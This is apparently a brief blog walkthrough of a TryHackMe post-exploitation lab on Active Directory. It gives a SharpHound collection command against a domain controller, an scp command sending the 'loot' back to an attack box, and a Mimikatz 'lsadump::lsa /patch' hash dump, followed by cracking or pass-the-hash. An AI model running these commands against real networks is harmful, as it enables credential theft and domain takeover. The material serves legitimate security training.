Bloodhounds and Mimikatz

In this post we will follow the TryHackMe room Post-Exploitation BasicsThis room takes us through some techniques red-teamers and APTs use once they have infiltrated a network. These Techniques include the use of tools such as Sharphound, bloodhound, mimikatz, and many more.


Sharphound to loot the domain controller

Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName

SCP to send the file back to your attack box

scp -rv C:\Users\Administrator\ root@

On your attack box, start bloodhound


Import your loot into bloodhound and use the queries to generate your attack paths

Now we run Mimikatz to get into our target admin accounts


Use privelege debug to run as administrator


then we dump hashes

lsadump::lsa /patch

Now we can either crack the hashes or use mimikatz to pass-the-hash